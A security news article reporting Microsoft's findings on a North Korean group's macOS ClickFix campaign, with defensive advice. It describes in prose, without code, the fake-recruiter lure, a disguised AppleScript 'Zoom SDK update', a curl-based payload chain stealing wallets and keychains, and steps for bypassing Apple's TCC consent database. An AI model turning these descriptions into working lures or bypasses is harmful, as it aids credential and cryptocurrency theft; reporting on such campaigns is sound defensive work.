North Korea Uses ClickFix to Target macOS Users' Data

APPLICATION SECURITY THREAT INTELLIGENCE DATA PRIVACY IDENTITY & ACCESS MANAGEMENT SECURITY NEWS North Korea Uses ClickFix to Target macOS Users' Data Sapphire Sleet uses fake job offers and phony Zoom updates to deliver ClickFix attacks that steal credentials and sensitive data from Macs. Alexander Culafi,Senior News Writer,Dark Reading April 16, 2026 3 Min Read SOURCE: EDWIN REMSBERG VIA ALAMY STOCK PHOTO North Korean threat actors are using a ClickFix variant to target macOS users and steal their most valuable data.  Microsoft Threat Intelligence today published research uncovering a macOS-focused cyber campaign attributed to a North Korean threat actor tracked as Sapphire Sleet. Like many campaigns attributed to North Korea, attacks rely on social engineering and, more specifically, ClickFix-style techniques.  ClickFix is a social engineering tactic that grew prominent over the past year. It most often works by inviting a target to an attacker-hosted website or virtual meeting (like Zoom or Teams), but then the target is informed there are technical issues that must be addressed — installing a file or running a shell command. Except that there are no technical issues, and the user is tricked into connecting to attacker infrastructure or installing a malicious binary. Sherrod DeGrippo, general manager of Global Threat Intelligence at Microsoft, tells Dark Reading that ClickFix is so effective because users are conditioned to accept remote support interactions like clicking prompts, downloading tools, and following instructions. "Attackers exploit this familiarity to make malicious actions feel routine, lowering victim skepticism at the critical moment of compromise," she says. Related:Critical MCP Integration Flaw Puts NGINX at Risk While many threat actors around the world have utilized ClickFix by now, it has become a favorite of North Korean actors like Sapphire Sleet. The nation-state group is believed to overlap with threats tracked as UNC1069, APT38, and Stardust Chollima. Sapphire Sleet is focused primarily on financially supporting the North Korean government through cryptocurrency and intellectual property theft.  "In this campaign, Sapphire Sleet takes advantage of user‑initiated execution to establish persistence, harvest credentials, and exfiltrate sensitive data while operating outside traditional macOS security enforcement boundaries," Microsoft's blog post read. Loading... How This macOS ClickFix Attack Works For the described activity, researchers said Sapphire Sleet would create fake recruiter profiles on social media and professional networking platforms, directly engage targets under the pretense of job opportunities, and then schedule a technical interview.  The "interviewer" then directs the target to install a Zoom SDK update that is named "Zoom SDK Update.scpt." This is a compiled AppleScript file that opens in macOS Script Editor by default. The user is then instructed to click the "Run the Script" button.  Unlike Windows-focused ClickFix attacks that generally copy malicious shell commands to the target's clipboard and guide the target to paste it in themselves, this macOS variant relies on opening a file to execute arbitrary code.  Related:Adobe Patches Actively Exploited Zero-Day That Lingered for Months The "SDK update" triggers a multistage payload chain, using curl commands to execute multiple AppleScript payloads. This includes an attack orchestration beacon, credential harvesters, a data stealer (which targets wallets, browser, keychains, history, Apple Notes, and Telegram), multiple backdoors for persistence, and a decoy prompt reassuring the user that the installation process has been completed.  Prior to exfiltration, the payload chain also manages to bypass Apple's Transparency, Consent, and Control (TCC) security framework, used for enforcing user consent prior to taking certain actions. The attacker renames a critical file associated with the TCC process, brings it to a staging location, and injects a new entry into the database access table, preventing a user prompt from being triggered. The modified database is copied back into the original folder and moved back to its original location with its original name.  To defend against Sapphire Sleet, Microsoft recommends organizations educate users about social engineering attacks and how ClickFix attacks work; blocking or restricting the execution of .scpt files and unsigned Mach-O binaries downloaded from the Internet; exercising caution when copying and pasting sensitive data; and protecting cryptocurrency wallets and browser credential stores. The blog post also includes indicators of compromise. Related:Can Anthropic Keep Its Exploit-Writing AI Out of the Wrong Hands? Microsoft reported details of the campaign to Apple, and said Apple has "since implemented updates to help detect and block infrastructure and malware associated with this campaign."  Don't miss the latest Dark Reading Confidential podcast, Security Bosses Are All in on AI: Here's Why, where Reddit CISO Fredrick Lee and Omdia analyst Dave Gruber discuss AI and machine learning in the SOC, how successful deployments have (or haven't) been, and what the future holds for AI security products. Listen now! About the Author Alexander Culafi Senior News Writer, Dark Reading Alex is an award-winning writer, journalist, and podcast host based in Boston. After cutting his teeth writing for independent gaming publications as a teenager, he graduated from Emerson College in 2016 with a Bachelor of Science in journalism. He has previously been published on VentureFizz, Search Security, Nintendo World Report, and elsewhere. In his spare time, Alex hosts the weekly Nintendo podcast Talk Nintendo Podcast and works on personal writing projects, including two previously self-published science fiction novels. Want more Dark Reading stories in your Google search results? ADD US NOW More Insights Industry Reports CISO Survey 2026: The State of Incident Response Readiness AI SOC for MDR: The Structural Evolution of Managed Detection and Response How Enterprises Are Developing Secure Applications 2026 CISO AI Risk Report QKS AI Maturity Matrix Access More Research Webinars Defending Against AI-Powered Attacks: The Evolution of Adversarial Machine Learning Tips for Managing Cloud Security in a Hybrid Environment? Zero Trust Architecture for Cloud environments: Implementation Roadmap Security in the AI Age Identity Maturity Under Pressure: 2026 Findings and How to Catch Up More Webinars You May Also Like APPLICATION SECURITY Multiple ChatGPT Security Bugs Allow Rampant Data Theft by Jai Vijayan, Contributing Writer NOV 06, 2025 APPLICATION SECURITY Self-Propagating GlassWorm Attacks VS Code Supply Chain by Elizabeth Montalbano, Contributing Writer OCT 20, 2025 APPLICATION SECURITY 'Lies-in-the-Loop' Attack Defeats AI Coding Agents by Elizabeth Montalbano, Contributing Writer SEP 15, 2025 CYBERATTACKS & DATA BREACHES DeepSeek Breach Opens Floodgates to Dark Web by Emma Zaballos APR 22, 2025 Editor's Choice VULNERABILITIES & THREATS EDR-Killer Ecosystem Expansion Requires Stronger BYOVD Defenses byRob Wright APR 14, 2026 8 MIN READ СLOUD SECURITY CSA: CISOs Should Prepare for Post-Mythos Exploit Storm byAlexander Culafi APR 13, 2026 6 MIN READ СLOUD SECURITY Navigating the Unique Security Risks of Asia's Digital Supply Chain byAlexander Culafi APR 15, 2026 3 MIN READ Want more Dark Reading stories in your Google search results? 2026 Security Trends & Outlooks THREAT INTELLIGENCE Cybersecurity Predictions for 2026: Navigating the Future of Digital Threats JAN 2, 2026 CYBER RISK Navigating Privacy and Cybersecurity Laws in 2026 Will Prove Difficult JAN 12, 2026 ENDPOINT SECURITY CISOs Face a Tighter Insurance Market in 2026 JAN 5, 2026 THREAT INTELLIGENCE 2026: The Year Agentic AI Becomes the Attack-Surface Poster Child JAN 30, 2026 Download the Collection Loading... Keep up with the latest cybersecurity threats, newly discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox. SUBSCRIBE Webinars Defending Against AI-Powered Attacks: The Evolution of Adversarial Machine Learning MON, MAY 11, 2026 AT 1:00PM ET Zero Trust Architecture for Cloud environments: Implementation Roadmap TUES, MAY 12, 2026 AT 1PM EST Tips for Managing Cloud Security in a Hybrid Environment? THURS, MAY 7, 2026 AT 1PM EST Security in the AI Age TUES, APRIL 28, 2026 AT 1PM EST Identity Maturity Under Pressure: 2026 Findings and How to Catch Up WED, MAY 6,2026 AT 1PM EST More Webinars White Papers How Sunrun Transformed Security Operations with AiStrike Autonomous Pentesting at Machine Speed, Without False Positives Best practices for incident response planning Industry Report: AI, SOC, and Modernizing Cybersecurity The Threat Prevention Buyer's Guide: Find the best AI-driven threat protection solution to stop file-based attacks. Explore More White Papers BLACK HAT ASIA | MARINA BAY SANDS, SINGAPORE Experience cutting-edge cybersecurity insights in this four-day event featuring expert Briefings on the latest research, Arsenal tool demos, a vibrant Business Hall, networking opportunities, and more. Use code DARKREADING for a Free Business Pass or $200 off a Briefings Pass. GET YOUR PASS GISEC GLOBAL 2026 GISEC GLOBAL is the most influential and the largest cybersecurity gathering in the Middle East & Africa, uniting global CISOs, government leaders, technology buyers, and ethical hackers for three power-packed days of innovation, strategy, and live cyber drills. 📌 BOOK YOUR SPACE